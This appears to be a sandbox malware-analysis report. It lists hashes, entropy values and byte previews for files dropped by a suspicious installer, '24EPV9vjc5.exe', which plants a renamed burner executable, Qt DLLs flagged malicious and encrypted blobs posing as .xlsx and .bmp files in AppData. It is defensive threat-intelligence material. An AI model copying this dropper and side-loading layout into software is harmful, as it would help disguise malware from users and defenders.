Preview:	{.. "author": {.. "email": "docs-hosted-app-own@google.com".. },.. "background": {.. "service_worker": "service_worker_bin_prod.js".. },.. "content_capabilities": {.. "matches": [ "https://docs.google.com/", "https://drive.google.com/", "https://drive-autopush.corp.google.com/", "https://drive-daily-0.corp.google.com/", "https://drive-daily-1.corp.google.com/", "https://drive-daily-2.corp.google.com/", "https://drive-daily-3.corp.google.com/", "https://drive-daily-4.corp.google.com/", "https://drive-daily-5.corp.google.com/", "https://drive-daily-6.corp.google.com/", "https://drive-preprod.corp.google.com/", "https://drive-staging.corp.google.com/" ],.. "permissions": [ "clipboardRead", "clipboardWrite", "unlimitedStorage" ].. },.. "content_security_policy": {.. "extension_pages": "script-src 'self'; object-src 'self'".. },.. "default_locale": "en_US",.. "description": "__MSG_extDesc__",.. "externally_connectable": {.. "ma

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\offscreendocument.html

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	97
Entropy (8bit):	4.862433271815736
Encrypted:	false
SSDEEP:	3:PouV7uJL5XL/oGLvLAAJR90bZNGXIL0Hac4NGb:hxuJL5XsOv0EmNV4HX4Qb
MD5:	B747B5922A0BC74BBF0A9BC59DF7685F
SHA1:	7BF124B0BE8EE2CFCD2506C1C6FFC74D1650108C
SHA-256:	B9FA2D52A4FFABB438B56184131B893B04655B01F336066415D4FE839EFE64E7
SHA-512:	7567761BE4054FCB31885E16D119CD4E419A423FFB83C3B3ED80BFBF64E78A73C2E97AAE4E24AB25486CD1E43877842DB0836DB58FBFBCEF495BC53F9B2A20EC
Malicious:	false
Preview:	<!DOCTYPE html>.<html>.<body>. <script src="offscreendocument_main.js"></script>.</body>.</html>

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\offscreendocument_main.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	122218
Entropy (8bit):	5.439997574414675
Encrypted:	false
SSDEEP:	1536:naCwKqAbNBbV9HGsR43l9S6w3xu7gXMgaG0R6RxNbF4Ki3wqP+PrQY2PEtb1B:Jfcs1XMr2zbF4Ki+PkPEfB
MD5:	67C4451398037DD1C497A1EA98227630
SHA1:	F5BB00D46BCAB5A8A02E68E4895AEB6859B74AA8
SHA-256:	59123D5A34A319791E90391FC55F0F4B8F5ABB6DB67353609DB25ACC3E99C166
SHA-512:	17F35CE2A11C26168CC52C4AE2BEC548A1AEB1B1F9CB3475B0552BDE71CFE94C5C0C4F3F51267EF7C7D9B0E01E1D1259F48968E70EE1E905471BA0C76ECA81EA
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var ha=ea(this);function r(a,b){if(b)a:{var c=ha;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\page_embed_script.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	4.65176400421739
Encrypted:	false
SSDEEP:	6:2LGX86tj66rU8j6D3bWq2un/XBtzHrH9Mnj63LK603:2Q8KVqb2u/Rt3Onj1
MD5:	3AB0CD0F493B1B185B42AD38AE2DD572
SHA1:	079B79C2ED6F67B5A5BD9BC8C85801F96B1B0F4B
SHA-256:	73E3888CCBC8E0425C3D2F8D1E6A7211F7910800EEDE7B1E23AD43D3B21173F7
SHA-512:	32F9DB54654F29F39D49F7A24A1FC800DBC0D4A8A1BAB2369C6F9799BC6ADE54962EFF6010EF6D6419AE51D5B53EC4B26B6E2CDD98DEF7CC0D2ADC3A865F37D3
Malicious:	false
Preview:	(function(){window._docs_chrome_extension_exists=!0;window._docs_chrome_extension_features_version=2;window._docs_chrome_extension_permissions="alarms clipboardRead clipboardWrite storage unlimitedStorage offscreen".split(" ");window._docs_chrome_extension_manifest_version=3;}).call(this);.

C:\Users\user\AppData\Local\Temp\scoped_dir6592_991230367\CRX_INSTALL\service_worker_bin_prod.js

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with very long lines (4882)
Category:	dropped
Size (bytes):	130866
Entropy (8bit):	5.425065147784983
Encrypted:	false
SSDEEP:	1536:zKjBw7l0GLFqjLmqoTquyBQCGLu5fJDX5pwPGFSS2IH0dKxQ5SbNyO+DrxZlkaY8:XYQi3DX5WkfH0dKxdboDrNOdor
MD5:	1A8A1F4E5BA291867D4FA8EF94243EFA
SHA1:	B25076D2AE85BD5E4ABA935F758D5122CCB82C36
SHA-256:	441385D13C00F82ABEEDD56EC9A7B2FE90658C9AACB7824DEA47BB46440C335B
SHA-512:	F05668098B11C60D0DDC3555FCB51C3868BB07BA20597358EBA3FEED91E59F122E07ECB0BD06743461DFFF8981E3E75A53217713ABF2A78FB4F955641F63537C
Malicious:	false
Preview:	'use strict';function aa(){return function(a){return a}}function k(){return function(){}}function n(a){return function(){return this[a]}}function ba(a){return function(){return a}}var q;function ca(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}}var da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.function ea(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("Cannot find global object");}var fa=ea(this);function r(a,b){if(b)a:{var c=fa;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}}.r("Symbol",function(a){function b(f){if(this instanceof b)throw new T

C:\Users\user\AppData\Roaming\TaskManage\QtCore4.dll

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2598912
Entropy (8bit):	6.6049974235008655
Encrypted:	false
SSDEEP:	49152:VTFgiFpGXOENKSgjGkJsv6tWKFdu9C6TELyvL/6mShMZtmjNUVrciV5P+7QVg07/:V+iDaWjxJsv6tWKFdu9CZgfQ
MD5:	FECC62A37D37D9759E6B02041728AA23
SHA1:	0C5F646CAEF7A6E9073D58ED698F6CFBFB2883A3
SHA-256:	94C1395153D7758900979351E633AB68D22AE9B306EF8E253B712A1AAB54C805
SHA-512:	698F90F1248DACBD4BDC49045A4E80972783D9DCEC120D187ABD08F5EF03224B511F7870320938B7E8BE049C243FFB1C450C847429434EF2E2C09288CB9286A6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............,..,..,J.,,..,.<,..,.<(,..,..7,..,..',..,..,..,.<.,...,.<.,...,.</,..,.<.,..,.<),..,Rich..,........................PE..L...T..Q...........!................B..............g..............U...........'......;(...@...........................!.<x..<.!.......&.......................&....................................... .@...............(............................text.............................. ..`.rdata..<...........................@..@.data....2...p&.....Z&.............@....rsrc.........&.......&.............@..@.reloc........&.......&.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\QtGui4.dll

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8581632
Entropy (8bit):	6.736578346160889
Encrypted:	false
SSDEEP:	98304:YxRJATZlLne1/cF6ZWHxD1HFH+J+70msIWeiLtRgi3d4PJpTcSqxyr:YxiZBG2xpljTcJy
MD5:	831BA3A8C9D9916BDF82E07A3E8338CC
SHA1:	6C89FD258937427D14D5042736FDFCCD0049F042
SHA-256:	D2C8C8B6CC783E4C00A5EF3365457D776DFC1205A346B676915E39D434F5A52D
SHA-512:	BEDA57851E0E3781ECE1D0EE53A3F86C52BA99CB045943227B6C8FC1848A452269F2768BF4C661E27DDFBE436DF82CFD1DE54706D814F81797A13FEFEC4602C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......0...t...t...t......p.....u...oq.\|...}...q...oq.r...}..c...t.~.....oq.i...oq.....oq.u...oq.u...oq.u...Richt...........PE..L......Q...........!......Y...).....2.S.......Y....e..............U..........P............@...........................m..c...Ul.,.....{.......................{..O..................................x'e.@.............Y..............................text...K.Y.......Y................. ..`.rdata....!...Y...!...Y.............@..@.data...t.....z.......z.............@....rsrc.........{......r{.............@..@.reloc...y....{..z...x{.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\QtNetwork4.dll

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1053696
Entropy (8bit):	6.539052666912709
Encrypted:	false
SSDEEP:	12288:m+PpRNPe4+DZFvnwJ9o+Hllp59K03AskvvukLosiLHrv7F0YmIYunuGS:m+hRCZhwY+Hllp59OHvfo7HrCYmItnC
MD5:	8A2E025FD3DDD56C8E4F63416E46E2EC
SHA1:	5F58FEB11E84AA41D5548F5A30FC758221E9DD64
SHA-256:	52AE07D1D6A467283055A3512D655B6A43A42767024E57279784701206D97003
SHA-512:	8E3A449163E775DC000E9674BCA81FFABC7FECD9278DA5A40659620CFC9CC07F50CC29341E74176FE10717B2A12EA3D5148D1FFC906BC809B1CD5C8C59DE7BA1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D.....u...u...u......u..>....u..>....u..>....u...t.".u.......u..>.._.u..>....u..>....u..>....u.Rich..u.........PE..L......Q...........!.....x...........J.............d..............U..........`......I.....@.........................P.......43..d............................ ..........................................@............................................text....v.......x.................. ..`.rdata..H>.......@...\|..............@..@.data...8=..........................@....rsrc...............................@..@.reloc...9... ...:..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\QtXml4.dll

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	356352
Entropy (8bit):	6.447802510709224
Encrypted:	false
SSDEEP:	6144:6gdDO1NTI8ew+Rh9CY8gjvXQ0AObEL9gqIL:6gda1FI8V+f9FFzA1IL
MD5:	E9A9411D6F4C71095C996A406C56129D
SHA1:	80B6EEFC488A1BF983919B440A83D3C02F0319DD
SHA-256:	C9B2A31BFE75D1B25EFCC44E1DF773AB62D6D5C85EC5D0BC2DFE64129F8EAB5E
SHA-512:	93BB3DD16DE56E8BED5AC8DA125681391C4E22F4941C538819AD4849913041F2E9BB807EB5570EE13DA167CFECD7A08D16AD133C244EB6D25F596073626CE8A2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......GN.f./.5./.5./.5.W>5./.5.a55./.5..35./.5...5./.5..15./.5./.5...5...5./.5..65./.5..75./.5..05./.5Rich./.5........PE..L...Y..Q...........!.....v..........Z..............a..............U..................k....@..........................w..\...LL..d....0.......................@..hR..................................p...@...............p............................text....t.......v.................. ..`.rdata..............z..............@..@.data........ ......................@....rsrc........0......................@..@.reloc..la...@...b..................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\RescueCDBurner.exe

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	6487736
Entropy (8bit):	7.518089126573906
Encrypted:	false
SSDEEP:	98304:u4bRxuHuFP2rHLpHPA477yNRgoPbfnRROWR721LYfs17u0kcFrXLEJfwY:u4NxuOFI1AEyrbf/52BYfs1LkcFrXL+X
MD5:	11C8962675B6D535C018A63BE0821E4C
SHA1:	A150FA871E10919A1D626FFE37B1A400142F452B
SHA-256:	421E36788BFCB4433178C657D49AA711446B3A783F7697A4D7D402A503C1F273
SHA-512:	3973C23FC652E82F2415FF81F2756B55E46C6807CC4A8C37E5E31009CEC45AB47C5D4228C03B5E3A972CACD6547CF0D3273965F263B1B2D608AF89F5BE6E459A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......2/m.vN..vN..vN......wN..m..pN..m..zN...6..wN..m..cN...6..aN..vN...J..m..xN..m..$N..m..wN..m..wN..RichvN..................PE..L......e.................(....Z......Y.......@....@..........................0c.......c...@..................................b_.h.....`.8.............b.. ....b.X...PT..............................x.^.@............@..l............................text...r&.......(.................. ..`.rdata....W..@....W..,..............@..@.data...xM...0`.."....`.............@....rsrc...8.....`......<`.............@..@.reloc........b.......a.............@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\StarBurn.dll

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	664064
Entropy (8bit):	6.953961612144461
Encrypted:	false
SSDEEP:	12288:c/gzbnbASodCXNn5FJX5KLN9VmoBBDFyn/:kRSoSn5FJX5K59VmoDK
MD5:	A147F46E2E1F315AA219482D645BEED9
SHA1:	073A6AE153A903B31463FA33512AA93DA1E3BB6F
SHA-256:	2EB33D31364355ACBA660487F3747A9899DBDEB2221C58EB2BF916E53267DBC4
SHA-512:	690DD6A959C6043EFE48ECB840C6353B2CE5F95372933A7201959C5A2075657EE2B02921685EAF23AE0EC228ABD86AA24F7CB11A9F089EB49D20F6AB6C46E3B8
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......f.3 ".]s".]s".]s.R s#.]s.R0s#.]s..s .]s..s+.]s".\s..]s+..s9.]s+..s..]s+..sq.]s+..s#.]s+..s#.]s+..s#.]sRich".]s........................PE..L.....NK...........!.....R...................p.......................................J....@..........................*..C6......d................................B..@................................K..@...........X................................text...SP.......R.................. ..`.data...l\|...p...T...V..............@....idata..............................@....rsrc...............................@..@.reloc...d.......d..................@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\hypochondriac.xlsx

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	60283
Entropy (8bit):	4.569551839311306
Encrypted:	false
SSDEEP:	1536:JLFhcTCRX7325Q72JnHi/KPHVzwrU60mYuBYdoQ:hIC173hknmqBrRmzB9Q
MD5:	3620E2D48EB60EC875FB9262ABC87D2B
SHA1:	55C7CE6E00901BE5090D7D1ACFF47D30436FA5EF
SHA-256:	E8E6F472277E0F3EE5B6640B0EC436029AF329E37F0C84978399DEB38768BEB1
SHA-512:	CBE8C6BE90FD75EE9D0A912E832ED784C4273B495EE1246B97601A6FA24FA4CE6FB07BE97508DA4FA249F05C96D5A86DA1805099C06EDD1CA81E726954025DD9
Malicious:	false
Preview:	.M.kZ.u_aUO......KUF...ABb..F..u.]F.rV..f..t..qm.Z_C....a._rAHlPTAnm.XL...Bp\h.BD.nd..p.x..W.k..T]w.nn.l.xQ.NE.B.b.dF...K.V]j..Yr.A.t..O_mrdES_Ww.Wg.P.....vq.I.BT..f.Jm.xxf.....V.kU..HiyRuFEC`.....y...`cgmo.....Pk....UbG..GQ..N.o...wA^.A..K.J.Iv...xvp].Sh...Gh.F...OmAZdJ...c.....ftg...Bc....lKWOSh..[..j...h...Ra..If...oA.r.itG....x_m...K.........HV.mW.S..X.soGI[F.AavnVBbsd.W.hE..b^...kE.B.D.[.E......lsxC..rJUb.Ts.P....M.`[p...w.F...Mv...sJ.h.Gpc...PF.^.V^J..Q.j.JI.....r..aI.K.OSl..eU\vo.v...K.x..aR.h...h..R.N.sQ...Y.....K.B....VdiHm...s........_......w.^RY`.o`H.WT.sJ.is...]..^A]Z....k.KJ..s...p.F...l..........f.wq\g....MRl..a..o....cZ].`.D.w._g.g.X.b...WdC.GLeCj[.y...HR..mG.V.k...v..YA.KPhvtC..v.gpnBw..m....]..V.f...`..W..T.QnMk.sZ.We...u.^.h^....A.C....W.ww..H...y.m..Py..jV.rOgkpnaCm.....jZL..Xo...hS......Ao..e\^y]...PS.EMf.^k.Uu.TmO..\\WsQ.T..u.w.qAq`x\..m.S]Z.......po...^H\nphxx.y..Z.X.Zs........oO.r.m..vh.W.k....mBMw.JJ.hc...p].[........n..nI...R...MU.F.v.w......s..[C...LU...C..y.J

C:\Users\user\AppData\Roaming\TaskManage\msvcp100.dll

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	421200
Entropy (8bit):	6.59808962341698
Encrypted:	false
SSDEEP:	12288:iHEqYsrMWIqz473PTiPoH/aGhUgiW6QR7t5qv3Ooc8UHkC2eKq87:iH9YsIWIW4rPTiPofaDv3Ooc8UHkC2e8
MD5:	03E9314004F504A14A61C3D364B62F66
SHA1:	0AA3CAAC24FDF9D9D4C618E2BBF0A063036CD55D
SHA-256:	A3BA6421991241BEA9C8334B62C3088F8F131AB906C3CC52113945D05016A35F
SHA-512:	2FCFF4439D2759D93C57D49B24F28AE89B7698E284E76AC65FE2B50BDEFC23A8CC3C83891D671DE4E4C0F036CEF810856DE79AC2B028AA89A895BF35ABFF8C8D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........._d..17..17..17...7..17..7..17..07 .17(..7..17..7..17..7..17..7..17..7..17..7..17..7..17..7..17Rich..17........................PE..L.....K.........."!.................<.............x......................................@.................................`...<.... ...............V..P....0..H;..p................................/..@...............p............................text............................... ..`.data...$:.......,..................@....rsrc........ ......................@..@.reloc...S...0...T..................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\msvcr100.dll

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	770384
Entropy (8bit):	6.908020029901359
Encrypted:	false
SSDEEP:	12288:fQmCy3NeRjkpQmj3oaMtQqjoygfXq3kon9IlbgaOxQdVJJ6j5EBKX8hR5:ImCy3VQs9MtLjTgfa3kon9FaOdEz5
MD5:	67EC459E42D3081DD8FD34356F7CAFC1
SHA1:	1738050616169D5B17B5ADAC3FF0370B8C642734
SHA-256:	1221A09484964A6F38AF5E34EE292B9AFEFCCB3DC6E55435FD3AAF7C235D9067
SHA-512:	9ED1C106DF217E0B4E4FBD1F4275486CEBA1D8A225D6C7E47B854B0B5E6158135B81BE926F51DB0AD5C624F9BD1D09282332CF064680DC9F7D287073B9686D33
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ R.HA<.HA<.HA<.A9..KA<.HA=..A<.'7..@<.'7...A<.'7..\|A<.'7...A<.'7..IA<.'7..IA<.'7..IA<.RichHA<.........PE..L.....K.........."!................. ....... .....x.................................S....@..........................I......D...(.......................P....... L..h...8...........................pE..@............................................text............................... ..`.data...\|Z... ...N..................@....rsrc................X..............@..@.reloc.. L.......N...\..............@..B........................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\TaskManage\wiggery.bmp

Download File

Process:	C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\RescueCDBurner.exe
File Type:	data
Category:	dropped
Size (bytes):	4567853
Entropy (8bit):	7.952114001019503
Encrypted:	false
SSDEEP:	98304:s4YzUBK1aYCyi23JXZmRHxR+jR+7U2F5gDVK3DSU4xKxmpu+:sZoBMav2ZpmR2jzhKzS5gUpH
MD5:	30152DF1AEA607F1159EFEEAC2B8CED1
SHA1:	E290B0553638EE68EB68C1CCE1062C733906EC9B
SHA-256:	5E65CDCBE10EBA406222579CD400FC9D33D67F27F4F317188CCC8F33FF4589CC
SHA-512:	94E75D7C67968BBE2EF303FCB8755BEF703A2BD8A8144F754AE7A1C66E70B743FED7239B826F699F13C33208594E9AA5C118F6B73D6151597370B76F83C7C9DD
Malicious:	false
Preview:	.J.d.^YuYVDM...R..ofpYK....G...CsW.P...a.E.\j..HcC.Y.rM.....u.l..Hk\eU..kVk........lAUkkaV.s.p..KM..q.H.c].O..D......opV..[taJ.....H..o..BH...jwN.a...X....cS.Q...N...vZ.TE...FYkQ..\M..FF.....gY.w.\.hUUfvF....Fs..f.E\].n..df.O.om....]..pA]O..Sg.DA.\.C.LPN.dk...._y.hrFd.W[....K.R`.\J..xDAp^e.G...msqh.w.ga...Oo.....^..Ti^d...Q[].Be.\A.....eU`Wt...xyo.r.RRvP....T.q.H.v.....l..L..ouX...Hm..T...KnV....`.Ri.T`e.....Q.Q.MY.L..ZB....h.S...f.L......w..nZ.].yx.DE..H.Gsx[W.Ac..gTe.mXmG.^YgmcH.hB..D.^\pBV.YK.g....mtlM.....WZ..sfE...oHKw.e.U.V.......[c..al...B.l....X.qx..EZe.m.....D.moC...\..fFaa.k.gCEp...bQ.......O...ndb.g.M.I`.j.ZueZ..j...hCc.Dly..G....\...Q.T.P...]..._..]t.[..K.WWM.bPp.H.w.lv...Y.frH..Ghx..PQuef.T`Ojqi.`.HY.vs...O.l.o.R.R..p.t.....Bk....S.e.....[DR`.Lv.]oJg.D.nao.p...ibP.L.QN.k..RC.O.f..i`...W.\.....T.p...H.........ZGG.n[[.H.^.e.ZX..S.DQ.NU..ap...B..P.Z..M..R..[Mp...TYH.u.....w^xi...w...C.PJkx...Oy..t.c........t....I.T..FR.N....Obkq.H.\w......W.wn.]uFRoi^D..F.P.......H.H.vd.[Axtp

C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe

Download File

Process:	C:\Users\user\Desktop\24EPV9vjc5.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	15692672
Entropy (8bit):	7.995895236161738
Encrypted:	true
SSDEEP:	393216:se0FFc3aeSMYMe6/mHQha2NYPY4CF9UUQoAKvWtU57wCvXjy:sRcqetYMe6dgB4QoxwgD/jy
MD5:	EC4072E1AE2A9316270E6AFD66235A97
SHA1:	EC499500172CA2CC76C5B30ECA34FCEB9BACCE0D
SHA-256:	C5056AC95A2002BC08CB0EC8DBF064F78DFF400642EC1A6FC2A132984A7C1D99
SHA-512:	80A87456A9B2AE9344F42A2F09F29B4CBCDBDA61418270EF1BAF11399C7E0FAC0C6A95D51682BA6205DB908B84E17D7C4A3FF78EBAC3EFEC75F5298B56CBEB7A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A!.S.@...@...@......@.....y@......@..."\|..@..."{..@..."z.#@...8...@...8...@...@~.PA...#z.N@...#...@...@...@...#}..@..Rich.@..................PE..L......Z.....................t....................@..........................P............@.............................................$:.......................=..Pv..T....................v......0p..@...................4........................text...7........................... ..`.rdata..`...........................@..@.data...0...........................@....wixburn8...........................@..@.rsrc...$:.......<..................@..@.reloc...=.......>..................@..B................................................................................................................................................................................................................................................

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\BootstrapperApplicationData.xml

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with very long lines (449), with CRLF line terminators
Category:	dropped
Size (bytes):	1986
Entropy (8bit):	3.7259224395984756
Encrypted:	false
SSDEEP:	48:y+03qHhhOFnquPpne1oucb+JH0w//yccuTZxQDOQrciGxr91Dl:X0nNhn6Ug0wXyczx8gVxrx
MD5:	3DA2E442D7803E1DADC2E8D8F383B817
SHA1:	1AC2C5AF9ECD7576173DFC41D48D650EBE3F245B
SHA-256:	5C0771EC10DD07A00F1302EB662B9B0389F62FFC0CFC68423451575D15749617
SHA-512:	8947DD3861F20CD7AFE9F8E251106B5B66519217CF26B0D65C1AC6516CF15C8F447FA27F817118CF81F22008AB39C0BFF3637607A1D4289CF9AD8DD08659AE0B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a. .x.m.l.n.s.=.".h.t.t.p.:././.s.c.h.e.m.a.s...m.i.c.r.o.s.o.f.t...c.o.m./.w.i.x./.2.0.1.0./.B.o.o.t.s.t.r.a.p.p.e.r.A.p.p.l.i.c.a.t.i.o.n.D.a.t.a.".>..... . .<.W.i.x.B.u.n.d.l.e.P.r.o.p.e.r.t.i.e.s. .D.i.s.p.l.a.y.N.a.m.e.=.".H.e.b.e.p.h.r.e.n.i.a.". .L.o.g.P.a.t.h.V.a.r.i.a.b.l.e.=.".W.i.x.B.u.n.d.l.e.L.o.g.". .C.o.m.p.r.e.s.s.e.d.=.".n.o.". .I.d.=.".{.9.4.6.b.b.f.d.e.-.2.e.2.c.-.4.5.c.e.-.9.b.b.b.-.9.a.5.3.3.c.5.3.c.d.8.8.}.". .U.p.g.r.a.d.e.C.o.d.e.=.".{.8.A.C.9.6.A.5.B.-.2.5.D.4.-.4.2.0.7.-.A.A.1.4.-.9.6.4.D.F.4.7.4.3.F.D.6.}.". .P.e.r.M.a.c.h.i.n.e.=.".y.e.s.". ./.>..... . .<.W.i.x.P.a.c.k.a.g.e.P.r.o.p.e.r.t.i.e.s. .P.a.c.k.a.g.e.=.".F.l.o.t.s.a.m.". .V.i.t.a.l.=.".y.e.s.". .D.i.s.p.l.a.y.N.a.m.e.=.".A.p.p.V.T.e.m.p.l.a.t.e.". .D.o.w.n.l.o.a.d.S.i.z.e.=.".3.1.6.4.1.6.". .P.a.c.k.a.g.e.S.i.z.e.=.".3.1.6.4.1.6.". .I.n.s.t.a.l.l.e.d.S.i.z.e.=.".

C:\Windows\Temp\{FAAFCC35-C685-416F-8D19-DF695975ACC5}\.ba\Fondue.dll

Download File

Process:	C:\Windows\Temp\{DDB994B7-0DF4-43BC-8A7D-97049E1F4DEB}\.cr\24EPV9vjc5.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	180800
Entropy (8bit):	5.521664858470418
Encrypted:	false
SSDEEP:	3072:eliOVvlKspsvyqocbjJscJcWPKMFWb4El8BdNfgJ4/zF9Q+QxgZhBax+opwMhkMf:F4Ua+4pl9D
MD5:	CA03420E7D92D1E8C8726615879FE50D
SHA1:	49A62B1AB815C7A49E1F082B1CF27D3C1E1619BF
SHA-256:	501B72E6C0FAF72779E013029BEAB90B6E02DD4FFE89DC6726FB897EF96274BF
SHA-512:	8A963607B28D29F518D656B2FE39C843894F6E378577F1A1206AC633A10585334FA04B67565F1DAF07F89A727D98C3657317405510E4F4AA88C61A1EBF19733D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......j....O...O...O..S../O...o..*O...o..,O...O..+O...O..N..LP..?O..om..=O...I../O...o../O..Rich.O..........PE..L....wCB...........!.........0......I..............[.................................M.................................../..d...........X.......................L... ................................................................................text...0........................... ..`.rdata..L_.......`..................@..@.data...l...........................@....rsrc...X...........................@..@.reloc........... ..................@..B.wCB`....wCBm....wCBw....wCB.....wCB.....wCB.....wCB.....wCB.....wCB.....wCB....^xCB............KERNEL32.dll.NTDLL.DLL.USER32.dll.GDI32.dll.WINSPOOL.DRV.comdlg32.dll.COMCTL32.dll.ADVAPI32.dll.SHELL32.dll.VERSION.dll.MSVCRT.dll..............................................................................................
